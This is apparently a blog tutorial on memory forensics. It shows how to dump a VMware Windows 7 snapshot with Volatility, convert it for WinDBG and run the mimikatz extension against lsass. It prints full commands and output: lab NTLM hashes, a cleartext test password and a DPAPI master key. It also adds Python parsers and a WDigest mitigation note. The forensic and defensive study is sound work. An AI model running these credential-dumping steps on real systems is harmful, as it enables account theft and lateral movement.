Memdumps, Volatility, Mimikatz, VMs – Part 6: VMWare Workstation

The VM is running Windows 7.
From the running machine take the snapshot:
Volatility can now be run directly against the .vmem file that the snapshot produced, no conversion needed:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f "C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem" imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf800029f50a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff800029f6d00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-29 17:48:24 UTC+0000
     Image local date and time : 2016-01-29 18:48:24 +0100
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f "C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem" --profile=Win7SP1x64 hivelist
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
------------------ ------------------ ----
0xfffff8a001ea6010 0x000000006a5f9010 \??\C:\Users\test\AppData\Local\Microsoft\Windows\UsrClass.dat
0xfffff8a00000d250 0x000000002d4e6250 [no name]
0xfffff8a000024010 0x000000002d491010 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000052010 0x000000002d53f010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a0000f6410 0x0000000024cbf410 \SystemRoot\System32\Config\DEFAULT
0xfffff8a000fec010 0x0000000026cbf010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a001003010 0x0000000023191010 \SystemRoot\System32\Config\SOFTWARE
0xfffff8a001263010 0x000000001d2a5010 \SystemRoot\System32\Config\SECURITY
0xfffff8a0012f6010 0x000000001d138010 \SystemRoot\System32\Config\SAM
0xfffff8a0013ea010 0x0000000015820010 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xfffff8a001439010 0x0000000015446010 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xfffff8a001e0d010 0x00000000355c7010 \??\C:\Users\test\ntuser.dat
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -f "C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem" --profile=Win7SP1x64 -y 0xfffff8a000024010 -s 0xfffff8a0012f6010
Volatility Foundation Volatility Framework 2.5
Administrator:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Gast:501:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
test:1000:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
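The manual step between hivelist and hashdump above (reading the SYSTEM and SAM virtual offsets off the table and passing them as -y and -s) is easy to get wrong by hand. The following is an added example, not code from the post, that parses Volatility 2.x hivelist output and assembles those arguments; the embedded sample is constructed from the offsets shown above, and the function names are my own.

```python
import re

# Constructed sample in the layout of Volatility 2.5 "hivelist" output; offsets are the ones shown in the post.
HIVELIST_OUTPUT = """\
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
------------------ ------------------ ----
0xfffff8a001ea6010 0x000000006a5f9010 \\??\\C:\\Users\\test\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat
0xfffff8a00000d250 0x000000002d4e6250 [no name]
0xfffff8a000024010 0x000000002d491010 \\REGISTRY\\MACHINE\\SYSTEM
0xfffff8a000052010 0x000000002d53f010 \\REGISTRY\\MACHINE\\HARDWARE
0xfffff8a0012f6010 0x000000001d138010 \\SystemRoot\\System32\\Config\\SAM
0xfffff8a001e0d010 0x00000000355c7010 \\??\\C:\\Users\\test\\ntuser.dat
"""

# One hive row: virtual offset, physical offset, then the hive name (which may contain spaces).
HIVE_ROW = re.compile(r"^(0x[0-9a-fA-F]+)\s+(0x[0-9a-fA-F]+)\s+(.+?)\s*$")


def parse_hivelist(output):
    """Map each hive name to (virtual, physical) offsets as ints; banner and header lines do not match."""
    hives = {}
    for line in output.splitlines():
        m = HIVE_ROW.match(line.strip())
        if m:
            hives[m.group(3)] = (int(m.group(1), 16), int(m.group(2), 16))
    return hives


def find_hive(hives, suffix):
    """Virtual offset of the first hive whose path ends with `suffix` (case-insensitive), or None."""
    for name, (virt, _phys) in hives.items():
        if name.lower().endswith(suffix.lower()):
            return virt
    return None


def hashdump_args(hives, profile):
    """Assemble the arguments hashdump needs: -y is the SYSTEM hive, -s the SAM hive (virtual offsets)."""
    system, sam = find_hive(hives, "\\SYSTEM"), find_hive(hives, "\\SAM")
    if system is None or sam is None:
        # A missing hive usually means a wrong profile or pages that were not captured in the snapshot.
        raise ValueError("SYSTEM or SAM hive not found in hivelist output")
    return ["--profile=" + profile, "hashdump", "-y", "0x%x" % system, "-s", "0x%x" % sam]
```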
WinDBG
The WinDBG method works too, but the snapshot first needs to be converted into a crash dump. Download vmss2core (https://labs.vmware.com/flings/vmss2core).
Then convert the image:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>..\vmss2core-win.exe -W "C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmsn" "C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem"
vmss2core version 2452889 Copyright (C) 1998-2015 VMware, Inc. All rights reserved.
… 10 MBs written.
… 20 MBs written.
… 30 MBs written.
… 40 MBs written.
… 50 MBs written.
… 60 MBs written.
… 70 MBs written.
… 80 MBs written.
… 90 MBs written.
… 100 MBs written.
Then continue exactly as in part 3, loading the resulting memory.dmp in WinDBG:
Microsoft (R) Windows Debugger Version 6.3.9600.17336 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
Loading Dump File [C:\Users\dax\Downloads\volatility_2.5.win.standalone\memory.dmp]
Kernel Complete Dump File: Full address space is available
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
*                                                                   *
* The Symbol Path can be set by:                                    *
*   using the _NT_SYMBOL_PATH environment variable.                 *
*   using the -y <symbol_path> argument when starting the debugger. *
*   using .sympath and .sympath+                                    *
*********************************************************************
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntkrnlmp.exe -
Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x64
Product: WinNt, suite: TerminalServer SingleUserTS Personal
Built by: 7601.17514.amd64fre.win7sp1_rtm.101119-1850
Machine Name:
Kernel base = 0xfffff800`02804000 PsLoadedModuleList = 0xfffff800`02a49e90
Debug session time: Fri Jan 29 18:48:24.926 2016 (UTC + 1:00)
System Uptime: 0 days 0:05:16.423
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
*                                                                   *
* The Symbol Path can be set by:                                    *
*   using the _NT_SYMBOL_PATH environment variable.                 *
*   using the -y <symbol_path> argument when starting the debugger. *
*   using .sympath and .sympath+                                    *
*********************************************************************
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntkrnlmp.exe -
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
………………….
Loading User Symbols
……………………………………………………….
……………………..
Loading unloaded module list
....*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll -
************* Symbol Loading Error Summary **************
Module name            Error
ntkrnlmp               The system cannot find the file specified
ntdll                  The system cannot find the file specified
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for vmtools.dll -
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************
Use !analyze -v to get detailed debugging information.
BugCheck 80, {4f4454, 0, 0, 0}
*** ERROR: Module load completed but symbols could not be loaded for mssmbios.sys
***** Kernel symbols are WRONG. Please fix symbols to do analysis.
*************************************************************************
***                                                                   ***
***                                                                   ***
***    Either you specified an unqualified symbol, or your debugger   ***
***    doesn't have full symbol information.  Unqualified symbol      ***
***    resolution is turned off by default. Please either specify a   ***
***    fully qualified symbol module!symbolname, or enable resolution ***
***    of unqualified symbols by typing ".symopt- 100". Note that     ***
***    enabling unqualified symbol resolution with network symbol     ***
***    server shares in the symbol path may cause the debugger to     ***
***    appear to hang for long periods of time when an incorrect      ***
***    symbol name is typed or the network symbol server is down.     ***
***                                                                   ***
***    For some commands to work properly, your symbol path           ***
***    must point to .pdb files that have full type information.      ***
***                                                                   ***
***    Certain .pdb files (such as the public OS symbols) do not      ***
***    contain the required information.  Contact the group that      ***
***    provided you with these symbols if you need this command to    ***
***    work.                                                          ***
***                                                                   ***
***    Type referenced: nt!_KPRCB                                     ***
***                                                                   ***
*************************************************************************
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
*                                                                   *
* The Symbol Path can be set by:                                    *
*   using the _NT_SYMBOL_PATH environment variable.                 *
*   using the -y <symbol_path> argument when starting the debugger. *
*   using .sympath and .sympath+                                    *
*********************************************************************
Probably caused by : ntkrnlmp.exe
Followup: MachineOwner
———
kd> .load c:\users\dax\downloads\mimikatz\x64\mimilib.dll
  .#####.   mimikatz 2.0 alpha (x64) built on Jan 17 2016 00:38:45
 .## ^ ##.  "A La Vie, A L'Amour" - Windows build 7601
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                  WinDBG extension ! * * */
===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================
kd> !process 0 0 lsass.exe
NT symbols are incorrect, please fix symbols
kd> .SymFix
kd> .Reload
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
………………….
Loading User Symbols
……………………………………………………….
……………………..
Loading unloaded module list
….Unable to enumerate user-mode unloaded modules, NTSTATUS 0xC0000147
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for vmtools.dll -
************* Symbol Loading Error Summary **************
Module name            Error
vmtools                PDB not found : cache*
                       No data is available : SRV*http://msdl.microsoft.com/download/symbols
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
kd> !process 0 0 lsass.exe
PROCESS fffffa8003a7bb30
    SessionId: 0  Cid: 020c    Peb: 7fffffdb000  ParentCid: 01a4
    DirBase: 1e66e000  ObjectTable: fffff8a00123c6e0  HandleCount: 538.
    Image: lsass.exe
kd> .process /r /p fffffa8003a7bb30
Implicit process is now fffffa80`03a7bb30
Loading User Symbols
……………………………………………………
kd> !mimikatz
DPAPI Backup keys
=================
Current prefered key:       {00000000-0000-0000-0000-000000000000}
Compatibility prefered key: {00000000-0000-0000-0000-000000000000}
SekurLSA
========
Authentication Id : 0 ; 430604 (00000000:0006920c)
Session           : Interactive from 1
User Name         : test
Domain            : WIN-254BC5SVOCB
Logon Server      : WIN-254BC5SVOCB
Logon Time        : 29.01.2016 18:46:10
SID               : S-1-5-21-1016508660-14321150-529431041-1000
    msv :
     [00000003] Primary
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * LM       : 624aac413795cdc1aad3b435b51404ee
     * NTLM     : c5a237b7e9d8e708d8436b6148a25fa1
     * SHA1     : 39cfdb69532cff3336f08a83aac42524f41cd6e9
    tspkg :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    wdigest :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    kerberos :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
     * Key List
       aes256_hmac       <no size, buffer is incorrect>
       aes128_hmac       <no size, buffer is incorrect>
       rc4_hmac_nt       c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old      c5a237b7e9d8e708d8436b6148a25fa1
       rc4_md4           c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_nt_exp   c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old_exp  c5a237b7e9d8e708d8436b6148a25fa1
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 430574 (00000000:000691ee)
Session           : Interactive from 1
User Name         : test
Domain            : WIN-254BC5SVOCB
Logon Server      : WIN-254BC5SVOCB
Logon Time        : 29.01.2016 18:46:10
SID               : S-1-5-21-1016508660-14321150-529431041-1000
    msv :
     [00000003] Primary
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * LM       : 624aac413795cdc1aad3b435b51404ee
     * NTLM     : c5a237b7e9d8e708d8436b6148a25fa1
     * SHA1     : 39cfdb69532cff3336f08a83aac42524f41cd6e9
    tspkg :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    wdigest :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    kerberos :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
     * Key List
       aes256_hmac       <no size, buffer is incorrect>
       aes128_hmac       <no size, buffer is incorrect>
       rc4_hmac_nt       c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old      c5a237b7e9d8e708d8436b6148a25fa1
       rc4_md4           c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_nt_exp   c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old_exp  c5a237b7e9d8e708d8436b6148a25fa1
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOKALER DIENST
Domain            : NT-AUTORITÄT
Logon Server      :
Logon Time        : 29.01.2016 18:43:31
SID               : S-1-5-19
    msv :
    tspkg : KO
    wdigest :
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    kerberos :
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-254BC5SVOCB$
Domain            : WORKGROUP
Logon Server      :
Logon Time        : 29.01.2016 18:43:31
SID               : S-1-5-20
    msv :
    tspkg : KO
    wdigest :
     * Username : WIN-254BC5SVOCB$
     * Domain   : WORKGROUP
     * Password : (null)
    kerberos :
     * Username : win-254bc5svocb$
     * Domain   : WORKGROUP
     * Password : (null)
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 48578 (00000000:0000bdc2)
Session           : UndefinedLogonType from 0
User Name         :
Domain            :
Logon Server      :
Logon Time        : 29.01.2016 18:43:29
SID               :
    msv :
    tspkg : KO
    wdigest : KO
    kerberos : KO
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-254BC5SVOCB$
Domain            : WORKGROUP
Logon Server      :
Logon Time        : 29.01.2016 18:43:29
SID               : S-1-5-18
    msv :
    tspkg : KO
    wdigest :
     * Username : WIN-254BC5SVOCB$
     * Domain   : WORKGROUP
     * Password : (null)
    kerberos :
     * Username : win-254bc5svocb$
     * Domain   : WORKGROUP
     * Password : (null)
    ssp :
    masterkey :
     [00000000]
     * GUID      :    {f22e410f-f947-4e08-8f2a-8f65df603f8d}
     * Time      :    29.01.2016 17:43:30
     * MasterKey :    19c05880b67d50f8231cd8009836e3cdc55610e4877f8b976abd5ca15600d0e759934324c6204b56f02527039e7fc52a1dfb5296d3381aaa7c3eb610dffa32fa
    credman :
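The SekurLSA output above is long and repetitive; what a defender wants from it is which logon sessions had a cleartext password sitting in LSASS and in which SSP. The following is an added example, not code from the post or from mimikatz, that parses that block format into sessions and reports the exposures; the embedded sample is a constructed, trimmed copy of the output above and the function names are my own.

```python
import re

# Constructed excerpt in the layout of the !mimikatz SekurLSA output above (values trimmed from the post).
SEKURLSA_OUTPUT = """\
Authentication Id : 0 ; 430604 (00000000:0006920c)
Session           : Interactive from 1
User Name         : test
Domain            : WIN-254BC5SVOCB
    msv :
     [00000003] Primary
     * NTLM     : c5a237b7e9d8e708d8436b6148a25fa1
    tspkg :
     * Password : test123
    wdigest :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    kerberos :
     * Password : test123
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-254BC5SVOCB$
Domain            : WORKGROUP
    msv :
    tspkg : KO
    wdigest :
     * Username : WIN-254BC5SVOCB$
     * Password : (null)
    kerberos :
     * Password : (null)
"""


def parse_sessions(output):
    """Split SekurLSA output into logon sessions: header fields plus a dict per SSP of its '* key : value' lines."""
    sessions, current, provider = [], None, None
    for raw in output.splitlines():
        line = raw.rstrip()
        if line.startswith("Authentication Id"):
            current = {"auth_id": line.split(":", 1)[1].strip(), "providers": {}}
            sessions.append(current)
            provider = None
        elif current is None:
            continue
        elif not line.startswith(" "):  # session header field, e.g. "User Name : test"
            key, _, val = line.partition(":")
            current[key.strip()] = val.strip()
        elif re.match(r"^ {4}\S", line):  # SSP line at 4-space indent, e.g. "    wdigest :" or "    tspkg : KO"
            provider = line.split(":", 1)[0].strip()
            current["providers"][provider] = {}
        elif line.lstrip().startswith("* ") and provider:  # SSP attribute, e.g. "     * Password : test123"
            key, _, val = line.lstrip()[2:].partition(":")
            current["providers"][provider][key.strip()] = val.strip()
    return sessions


# SSPs that, in the Windows 7 dump above, kept the cleartext logon password in LSASS memory.
CLEARTEXT_SSPS = ("tspkg", "wdigest", "kerberos")


def cleartext_exposures(sessions):
    """Return (user, ssp) pairs for every session where an SSP still held a real (non-null) password."""
    found = []
    for s in sessions:
        for ssp in CLEARTEXT_SSPS:
            pw = s["providers"].get(ssp, {}).get("Password")
            if pw and pw != "(null)":
                found.append((s.get("User Name", ""), ssp))
    return found
```

On Windows 7 the wdigest hit is the one that KB2871997 together with HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 0 removes; rerunning this on a dump taken after that change should show (null) for wdigest.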
